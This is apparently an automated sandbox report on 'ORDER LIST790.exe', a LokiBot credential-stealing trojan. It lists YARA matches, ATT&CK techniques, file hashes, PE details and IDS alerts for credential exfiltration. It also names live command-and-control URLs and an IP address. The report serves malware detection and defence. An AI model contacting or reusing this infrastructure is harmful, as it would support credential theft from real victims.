Source: Yara match	File source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Input Capture	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	1 Credentials in Registry	1 Remote System Discovery	SMB/Windows Admin Shares	11 Archive Collected Data	Automated Exfiltration	111 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	2 Data from Local System	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Download
4.0.ORDER LIST790.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.ORDER LIST790.exe.470c248.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.ORDER LIST790.exe.4726268.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://philiphanson.org/medius/book/1.0	0%	Avira URL Cloud	safe
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://philiphanson.org/medius/temp-transform	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://66.29.145.162/?112233	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://66.29.145.162/?112233	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://apache.org	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://philiphanson.org/medius/book/1.0	ORDER LIST790.exe	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://philiphanson.org/medius/temp-transform	ORDER LIST790.exe	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.centos.org/	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://httpd.apache.org/	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://centos.org	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.29.145.162	unknown	United States		19538	ADVANTAGECOMUS	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682143
Start date and time:	2022-08-11 05:36:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER LIST790.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 148 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:37:17	API Interceptor	2x Sleep call for process: ORDER LIST790.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
66.29.145.162	SGH6336225-PO#1880230.exe	Get hash	malicious	Browse	66.29.145.162/?search
	SecuriteInfo.com.Trojan.Olock.1.24682.exe	Get hash	malicious	Browse	66.29.145.162/?Y8nalJQQXC4cNDqmmYx1iS34FS7RJj1IspTN8KE5
	Solicitud de oferta.exe	Get hash	malicious	Browse	66.29.145.162/?Y8nalJQQXC4cNDqmmYx1iS34FS7RJj1IspTN8KE5
	Request For Offer.exe	Get hash	malicious	Browse	66.29.145.162/?Y8nalJQQXC4cNDqmmYx1iS34FS7RJj1IspTN8KE5
	#po10082022pdf.exe	Get hash	malicious	Browse	66.29.145.162/?z7AxeySFoQMnwq9YvB
	DHL Shipping DOC.exe	Get hash	malicious	Browse	66.29.145.162/?QljQbcMOG3VmKZSR8LkYAaDGiquujSSadc0ooNc5R8rC7jtf5NdFYRmgiRKBJDLXQMmfAzkrHL3O5w4akhQi9
	SecuriteInfo.com.W32.AIDetectNet.01.8967.exe	Get hash	malicious	Browse	66.29.145.162/?x000000000000
	Shipment documents.exe	Get hash	malicious	Browse	66.29.145.162/?63823197049737992
	Redaktion.exe	Get hash	malicious	Browse	66.29.145.162/?java
	bT1t85w3hAsiVBo.exe	Get hash	malicious	Browse	66.29.145.162/?21349969823149192
	NOA_-_CNCAPLC_-_Notice_of_Arrival_-_HENG_HUI_5__-_0QABYN1NC_5631126608435000.PDF.exe	Get hash	malicious	Browse	66.29.145.162/?4214103
	SecuriteInfo.com.W32.AIDetectNet.01.25564.exe	Get hash	malicious	Browse	66.29.145.162/?63823197049737992
	Quote T0126 20220804-02.exe	Get hash	malicious	Browse	66.29.145.162/?xp5hVSpoI09otwOWEe982gSmLyidAZG7pMpkEOJnOSLioze3OncRE4dpCwDcwkkV6JgLy08nSTFhtTlihx9VBmleTZqpjLkqvBc
	Shipping Documents.exe	Get hash	malicious	Browse	66.29.145.162/?x000000000000
	DHL Express Receipt.exe	Get hash	malicious	Browse	66.29.145.162/?QljQbcMOG3VmKZSR8LkYAaDGiquujSSadc0ooNc5R8rC7jtf5NdFYRmgiRKBJDLXQMmfAzkrHL3O5w4akhQi9
	gunzipped.exe	Get hash	malicious	Browse	66.29.145.162/?java
	pKAW7R09ha.exe	Get hash	malicious	Browse	66.29.145.162/?4214103
	J03706001402022.exe	Get hash	malicious	Browse	66.29.145.162/?63823197049737992
	Shipping Documents.exe	Get hash	malicious	Browse	66.29.145.162/?x000000000000
	PROJE S#U0130PAR#U0130#U015e#U0130 2022RFQ 8388292.xlsx	Get hash	malicious	Browse	66.29.145.162/?17414649419491256

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ADVANTAGECOMUS	wZqHtSsa14.exe	Get hash	malicious	Browse	66.29.149.165
	SGH6336225-PO#1880230.exe	Get hash	malicious	Browse	66.29.145.162
	M61ridRaIr.exe	Get hash	malicious	Browse	66.29.141.5
	SecuriteInfo.com.Trojan.Olock.1.24682.exe	Get hash	malicious	Browse	66.29.145.162
	Ikd3EuXME8.exe	Get hash	malicious	Browse	66.29.141.5
	Solicitud de oferta.exe	Get hash	malicious	Browse	66.29.145.162
	Request For Offer.exe	Get hash	malicious	Browse	66.29.145.162
	TENDER BOQ-LH22000309AA2022_Pdf__.exe	Get hash	malicious	Browse	66.29.149.165
	#po10082022pdf.exe	Get hash	malicious	Browse	66.29.145.162
	DHL Shipping DOC.exe	Get hash	malicious	Browse	66.29.145.162
	TENDER BOQ-LH22000309AA2022_Pdf__.exe	Get hash	malicious	Browse	66.29.149.165
	SecuriteInfo.com.W32.AIDetectNet.01.8967.exe	Get hash	malicious	Browse	66.29.145.162
	Shipment documents.exe	Get hash	malicious	Browse	66.29.145.162
	A9F400B739DB381FA4D0EE9DBDA0829407400033B2D5A.exe	Get hash	malicious	Browse	66.29.141.5
	Unclear Proforma Invoice.vbs	Get hash	malicious	Browse	66.29.155.228
	Redaktion.exe	Get hash	malicious	Browse	66.29.145.162
	bT1t85w3hAsiVBo.exe	Get hash	malicious	Browse	66.29.145.162
	NOA_-_CNCAPLC_-_Notice_of_Arrival_-_HENG_HUI_5__-_0QABYN1NC_5631126608435000.PDF.exe	Get hash	malicious	Browse	66.29.145.162
	SecuriteInfo.com.W32.AIDetectNet.01.25564.exe	Get hash	malicious	Browse	66.29.145.162
	Quote T0126 20220804-02.exe	Get hash	malicious	Browse	66.29.145.162

Process:	C:\Users\user\Desktop\ORDER LIST790.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\Desktop\ORDER LIST790.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\ORDER LIST790.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbON:u
MD5:	89CA7E02D8B79ED50986F098D5686EC9
SHA1:	A602E0D4398F00C827BFCF711066E67718CA1377
SHA-256:	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
SHA-512:	C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.176290841783126
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ORDER LIST790.exe
File size:	872960
MD5:	80e4b72d26806ed5f245142166a48145
SHA1:	c07deb8c6fc551636d842c18d0540594afbe1c68
SHA256:	c5847da2de3c9aee81dc121287bb4c4c366d8c978f604cac6e19f80da1a46094
SHA512:	a520b295fb2cc2cccf94f0b6ad031d21680d39a4e906220982c43450a084d526beaafbac8cb4a2d01a97d8333c14c5bbcbb35f31e9b190112164e321d8c5b937
SSDEEP:	12288:4smY4vwHmQlBV8vpc++NxD9TP0gtp2Wftu4FnGV9nRUnlcsM2TgN/0s:/mY4vwHmQlBVapSXDuWFMVMlcmgi
TLSH:	9B058CEEAA98C45BCF604774F84944F42B66ACE1F021DDAF6893BC21F53239E515BD02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.b..............0..>...........]... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00684068688eb200

Static PE Info

General

Entrypoint:	0x4c5d86
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62F46CA3 [Thu Aug 11 02:42:43 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc5d34	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc6000	0x10ef4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc3d8c	0xc3e00	False	0.6307285019144863	data	7.320980599570163	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc6000	0x10ef4	0x11000	False	0.06841681985294118	data	4.12604928193498	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd8000	0xc	0x200	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xc6100	0x10828	data
RT_GROUP_ICON	0xd6938	0x14	data
RT_VERSION	0xd695c	0x398	data
RT_MANIFEST	0xd6d04	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.366.29.145.16249741802024317 08/11/22-05:37:23.228158	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49741	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249743802024318 08/11/22-05:37:28.256446	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249742802024312 08/11/22-05:37:26.351786	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49742	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249742802021641 08/11/22-05:37:26.351786	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249743802024313 08/11/22-05:37:28.256446	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249742802024317 08/11/22-05:37:26.351786	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49742	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249741802024312 08/11/22-05:37:23.228158	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49741	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249741802021641 08/11/22-05:37:23.228158	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249743802021641 08/11/22-05:37:28.256446	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.3	66.29.145.162

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 05:37:23.047916889 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:23.214819908 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:23.216342926 CEST	49741	80	192.168.2.3	66.29.145.162
